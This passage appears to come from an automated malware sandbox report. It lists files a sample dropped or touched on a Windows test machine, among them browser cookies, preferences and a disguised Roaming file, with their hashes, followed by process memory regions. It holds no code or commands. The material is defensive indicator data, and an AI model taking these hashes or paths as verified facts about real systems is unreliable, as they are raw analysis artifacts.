                  e813e90bf00e908eee8fd75d4779ee0f802f0148adf08739e8372ceac8b14e163eb55589b3c2f51dd126e1c253f4d461ce9430e58d0dee54a959646ae402dc56

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199

                  Filesize

                  170B

                  MD5

                  3afb1eb747a2509f0a9ab39f7e8ec646

                  SHA1

                  67568c815305aa6ff8da1a5ab87441702d256c36

                  SHA256

                  2c210a6814b8b6d59950af16b91a70a880d02c49670b3ce81fa30acca2506551

                  SHA512

                  fbed87269819fbb32cc511fef1a781211376189ef055d2d000bc1bce98f184836dc9a66e95435cbb9e4029ec880b42af666a2ffb7be0c763c14f712c8528acee

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

                  Filesize

                  410B

                  MD5

                  9fbe940eac06937b61c066c08b5f1272

                  SHA1

                  77a157733452800855260d4ee0bd4d1b6d9aadaa

                  SHA256

                  c93d92f02a1da7575388d02746c0f073f245fd06b2dc80f2ae741bd13a32393b

                  SHA512

                  3dab5c9cce378692cfd18ecf34a35a2eacb44504da4a3e1b42b23b02a4bf02038f93db524c991b5a68928f9e8b00b1f606d8f080064a3dc56b6a4f9b2cf0471f

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_841DF67C840691A847835C0F760B4DC0

                  Filesize

                  402B

                  MD5

                  30c30f8cd8300c17ccfa83c937e39e17

                  SHA1

                  1fff58964da2fcfaebc69218fc532e7d3f140482

                  SHA256

                  57587b4d3f1fe612f958450d6b65b3bc349a697e3b06500b0aa0b659641fdc1d

                  SHA512

                  b793fbec9ed61654b783bbe3127849875700541bad79fd10db38f4bd5e73644886783de35ebdf6673588b66b37dd8419a3e6634bd76d1ec25dd7ade22f913ed3

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                  Filesize

                  342B

                  MD5

                  7e5a8f4700eb0bcca058eb643b143163

                  SHA1

                  7a584c5e995b997fa523f4c8b1cd645bf35bf1f9

                  SHA256

                  50a7f25187cf3422199a09a73ad22dcb04b24a5efb826476e37b9adc11b317c9

                  SHA512

                  ce1477c350b9863a85b7378da6d1416aebd6b00f96a7a4c45617e345efcffe79fda9d7f423edfc3fe60c9b1b81746a8ae64dcad8c5e85d5b5fa033e5ef3c3610

                • C:\Users\Admin\AppData\Local\Temp\CabA852.tmp

                  Filesize

                  70KB

                  MD5

                  49aebf8cbd62d92ac215b2923fb1b9f5

                  SHA1

                  1723be06719828dda65ad804298d0431f6aff976

                  SHA256

                  b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                  SHA512

                  bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                • C:\Users\Admin\AppData\Local\Temp\Tar3229.tmp

                  Filesize

                  181KB

                  MD5

                  4ea6026cf93ec6338144661bf1202cd1

                  SHA1

                  a1dec9044f750ad887935a01430bf49322fbdcb7

                  SHA256

                  8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                  SHA512

                  6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                • C:\Users\Admin\AppData\Local\Temp\TmpUserData\1c773806-cf2f-49f0-ad4b-6895b3687a2d.tmp

                  Filesize

                  347KB

                  MD5

                  6b7a24c967188ea5f72e5f26ff55bf25

                  SHA1

                  652a74b5da5878a6fa4506dc10d27eea058f700a

                  SHA256

                  8d6288cd293ba0a322adf70509c8766f05e467a0e3e38ce809590b29bd13ace1

                  SHA512

                  98a02cc7bc5c67d14cf7fc61c4582ba2fdee5100e3833f1626e58123e2a74e5ed892f02b0ebbf15c9a6695553400583befde20afa7edd88003486683a2c102b4

                • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

                  Filesize

                  40B

                  MD5

                  579d1461f71f523aeb72526c2f429e6c

                  SHA1

                  07874caf76041aae0f92ca23eab4c187f3fb59ae

                  SHA256

                  ca9e2980f89261f6575bdfb0e744a1141068e5149be6a2631476adf1fe560133

                  SHA512

                  43e15904f788bc5eb4e96c964bf9d61ea1505cddbf3e5740d18b673103b49d1ad85fa82ae07fab58d294a8bc2c0553716ff71c5c8ef204f1bc2354fd2afa5993

                • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\DawnCache\data_1

                  Filesize

                  264KB

                  MD5

                  f50f89a0a91564d0b8a211f8921aa7de

                  SHA1

                  112403a17dd69d5b9018b8cede023cb3b54eab7d

                  SHA256

                  b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                  SHA512

                  bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\DawnCache\data_2

                  Filesize

                  8KB

                  MD5

                  0962291d6d367570bee5454721c17e11

                  SHA1

                  59d10a893ef321a706a9255176761366115bedcb

                  SHA256

                  ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

                  SHA512

                  f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

                • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\DawnCache\data_3

                  Filesize

                  8KB

                  MD5

                  41876349cb12d6db992f1309f22df3f0

                  SHA1

                  5cf26b3420fc0302cd0a71e8d029739b8765be27

                  SHA256

                  e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

                  SHA512

                  e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

                • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

                  Filesize

                  20KB

                  MD5

                  c9ff7748d8fcef4cf84a5501e996a641

                  SHA1

                  02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

                  SHA256

                  4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

                  SHA512

                  d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

                • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

                  Filesize

                  10KB

                  MD5

                  0c041c9718dc8bd56937599c02d5d896

                  SHA1

                  4370c0c386a995ca322d5d49b96cfebe5ca47183

                  SHA256

                  67b55f4761353c0b508d151da346bb31d65a05329aa935816488cb85895b18fc

                  SHA512

                  3dfcf96fed5f48b5f22b4bb44fd6a0f666e44afc406e94d2d1873e0d8b8d45b722724349d6227604e59efbb22ba4801edfbd7a2ed367a8c9ac2703e16c0364c4

                • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000002.dbtmp

                  Filesize

                  16B

                  MD5

                  206702161f94c5cd39fadd03f4014d98

                  SHA1

                  bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                  SHA256

                  1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                  SHA512

                  0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\CURRENT

                  Filesize

                  16B

                  MD5

                  46295cac801e5d4857d09837238a6394

                  SHA1

                  44e0fa1b517dbf802b18faf0785eeea6ac51594b

                  SHA256

                  0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                  SHA512

                  8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\MANIFEST-000001

                  Filesize

                  41B

                  MD5

                  5af87dfd673ba2115e2fcf5cfdb727ab

                  SHA1

                  d5b5bbf396dc291274584ef71f444f420b6056f1

                  SHA256

                  f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                  SHA512

                  de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\MANIFEST-000002

                  Filesize

                  50B

                  MD5

                  22bf0e81636b1b45051b138f48b3d148

                  SHA1

                  56755d203579ab356e5620ce7e85519ad69d614a

                  SHA256

                  e292f241daafc3df90f3e2d339c61c6e2787a0d0739aac764e1ea9bb8544ee97

                  SHA512

                  a4cf1f5c74e0df85dda8750be9070e24e19b8be15c6f22f0c234ef8423ef9ca3db22ba9ef777d64c33e8fd49fada6fcca26c1a14ba18e8472370533a1c65d8d0

                • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

                  Filesize

                  169KB

                  MD5

                  23da46e5c9424f2d16b226194b990082

                  SHA1

                  32a5b2de77cbc31177d453a610f0790d8b73e51c

                  SHA256

                  f78cb23922f7069abb5fb6fa440ec29e1e462730097ab359482bc1cc9104c1fa

                  SHA512

                  72c6eb94aa83f51c619245145c6934270c0cef61e98c063ca00bfd9ca970685e48f32c8bc2f872867f2e4d2746e9846a227486e566f01f63857e2c6dadd26230

                • C:\Users\Admin\AppData\Local\Temp\TmpUserData\ShaderCache\data_0

                  Filesize

                  8KB

                  MD5

                  cf89d16bb9107c631daabf0c0ee58efb

                  SHA1

                  3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

                  SHA256

                  d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

                  SHA512

                  8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

                • C:\Users\Admin\AppData\Local\Temp\eujs

                  Filesize

                  2B

                  MD5

                  f3b25701fe362ec84616a93a45ce9998

                  SHA1

                  d62636d8caec13f04e28442a0a6fa1afeb024bbb

                  SHA256

                  b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

                  SHA512

                  98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

                • C:\Users\Admin\AppData\Roaming\Dechemicalize.Opk

                  Filesize

                  409KB

                  MD5

                  c3ad0ea140353b5d6e712f99901cca68

                  SHA1

                  a02146059fc0e7dfea5db0fb4713e006d1cefdc6

                  SHA256

                  8b63cfd26d1d38bebd163bf43e0ce44026ddb0c9f81dc3a9cfdc0f8f69201376

                  SHA512

                  7f655c98f612349b64555467457b8a4b452c5bc5cfc31e39cbb7043dd6331d7ccbc2b070d01891e14a63fd49cdd3ed49546a56edd1c0df1e885424e4ff4bcb49

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N17D02K0UURE3NPOI12F.temp

                  Filesize

                  7KB

                  MD5

                  5dd33107034d73e768bef87cc513aa68

                  SHA1

                  2466d2ea69869ccd7fa20930625fcd92c13fc0a4

                  SHA256

                  5f5cea438056749f79537d63a32ce08f827f0eddf1dc0b40657519f31d72e157

                  SHA512

                  201254c935d31e4be697c4e02f52aa9d256a2485ff520abf9f4bc184178a77d42b36aa0fed6024e5248761172fe3e859e6320c8644c373711ab1b91eae846d29

                • \??\pipe\crashpad_2536_XYKBAPZEPEQWAZZH

                  MD5

                  d41d8cd98f00b204e9800998ecf8427e

                  SHA1

                  da39a3ee5e6b4b0d3255bfef95601890afd80709

                  SHA256

                  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                  SHA512

                  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                • memory/1416-361-0x00000000005F0000-0x0000000001652000-memory.dmp

                  Filesize

                  16.4MB

                • memory/1416-355-0x00000000005F0000-0x0000000001652000-memory.dmp

                  Filesize

                  16.4MB

                • memory/1416-373-0x00000000005F0000-0x0000000001652000-memory.dmp

                  Filesize

                  16.4MB

                • memory/1416-370-0x00000000005F0000-0x0000000001652000-memory.dmp

                  Filesize

                  16.4MB

                • memory/1416-367-0x00000000005F0000-0x0000000001652000-memory.dmp

                  Filesize

                  16.4MB

                • memory/1416-364-0x00000000005F0000-0x0000000001652000-memory.dmp

                  Filesize

                  16.4MB

                • memory/1416-379-0x00000000005F0000-0x0000000001652000-memory.dmp

                  Filesize

                  16.4MB

                • memory/1416-67-0x0000000022B80000-0x0000000022BB4000-memory.dmp

                  Filesize

                  208KB

                • memory/1416-358-0x00000000005F0000-0x0000000001652000-memory.dmp

                  Filesize

                  16.4MB

                • memory/1416-376-0x00000000005F0000-0x0000000001652000-memory.dmp

                  Filesize

                  16.4MB

                • memory/1416-352-0x00000000005F0000-0x0000000001652000-memory.dmp

                  Filesize

                  16.4MB

                • memory/1416-345-0x0000000022670000-0x0000000022689000-memory.dmp

                  Filesize

                  100KB

                • memory/1416-348-0x0000000022670000-0x0000000022689000-memory.dmp

                  Filesize

                  100KB

                • memory/1416-58-0x00000000005F0000-0x0000000001652000-memory.dmp

                  Filesize

                  16.4MB

                • memory/1416-349-0x0000000022670000-0x0000000022689000-memory.dmp

                  Filesize

                  100KB

                • memory/1416-62-0x00000000005F0000-0x0000000001652000-memory.dmp

                  Filesize

                  16.4MB

                • memory/1416-71-0x0000000022B80000-0x0000000022BB4000-memory.dmp

                  Filesize

                  208KB

                • memory/1416-282-0x00000000005F0000-0x0000000001652000-memory.dmp

                  Filesize

                  16.4MB

                • memory/1416-70-0x0000000022B80000-0x0000000022BB4000-memory.dmp

                  Filesize

                  208KB

                • memory/1748-99-0x0000000000400000-0x0000000000462000-memory.dmp

                  Filesize

                  392KB

                • memory/1748-106-0x0000000000400000-0x0000000000462000-memory.dmp

                  Filesize

                  392KB

                • memory/1748-104-0x0000000000400000-0x0000000000462000-memory.dmp

                  Filesize

                  392KB

                • memory/1748-102-0x0000000000400000-0x0000000000462000-memory.dmp

                  Filesize

                  392KB

                • memory/2324-111-0x0000000000400000-0x0000000000424000-memory.dmp

                  Filesize

                  144KB

                • memory/2324-109-0x0000000000400000-0x0000000000424000-memory.dmp

                  Filesize

                  144KB

                • memory/2324-108-0x0000000000400000-0x0000000000424000-memory.dmp

                  Filesize

                  144KB

                • memory/2324-112-0x0000000000400000-0x0000000000424000-memory.dmp

                  Filesize

                  144KB

                • memory/2552-26-0x000007FEF59F0000-0x000007FEF638D000-memory.dmp

                  Filesize

                  9.6MB

                • memory/2552-22-0x0000000002810000-0x0000000002818000-memory.dmp

                  Filesize

                  32KB

                • memory/2552-23-0x000007FEF59F0000-0x000007FEF638D000-memory.dmp

                  Filesize

                  9.6MB

                • memory/2552-34-0x000007FEF59F0000-0x000007FEF638D000-memory.dmp

                  Filesize

                  9.6MB

                • memory/2552-21-0x000000001B480000-0x000000001B762000-memory.dmp

                  Filesize

                  2.9MB

                • memory/2552-30-0x000007FEF59F0000-0x000007FEF638D000-memory.dmp

                  Filesize

                  9.6MB

                • memory/2552-32-0x000007FEF59F0000-0x000007FEF638D000-memory.dmp

                  Filesize

                  9.6MB

                • memory/2552-24-0x000007FEF59F0000-0x000007FEF638D000-memory.dmp

                  Filesize

                  9.6MB

                • memory/2552-25-0x000007FEF59F0000-0x000007FEF638D000-memory.dmp

                  Filesize

                  9.6MB

                • memory/2552-20-0x000007FEF5CAE000-0x000007FEF5CAF000-memory.dmp

                  Filesize

                  4KB

                • memory/2552-31-0x000007FEF59F0000-0x000007FEF638D000-memory.dmp

                  Filesize

                  9.6MB

                • memory/2552-27-0x000007FEF5CAE000-0x000007FEF5CAF000-memory.dmp

                  Filesize

                  4KB

                • memory/2552-28-0x000007FEF59F0000-0x000007FEF638D000-memory.dmp

                  Filesize

                  9.6MB

                • memory/2652-38-0x0000000006540000-0x000000000BDCC000-memory.dmp

                  Filesize

                  88.5MB

                • memory/3056-101-0x0000000000400000-0x0000000000478000-memory.dmp

                  Filesize

                  480KB

                • memory/3056-96-0x0000000000400000-0x0000000000478000-memory.dmp

                  Filesize

                  480KB

                • memory/3056-97-0x0000000000400000-0x0000000000478000-memory.dmp

                  Filesize

                  480KB

                • memory/3056-105-0x0000000000400000-0x0000000000478000-memory.dmp

                  Filesize

                  480KB

                • memory/3056-95-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

                  Filesize

                  4KB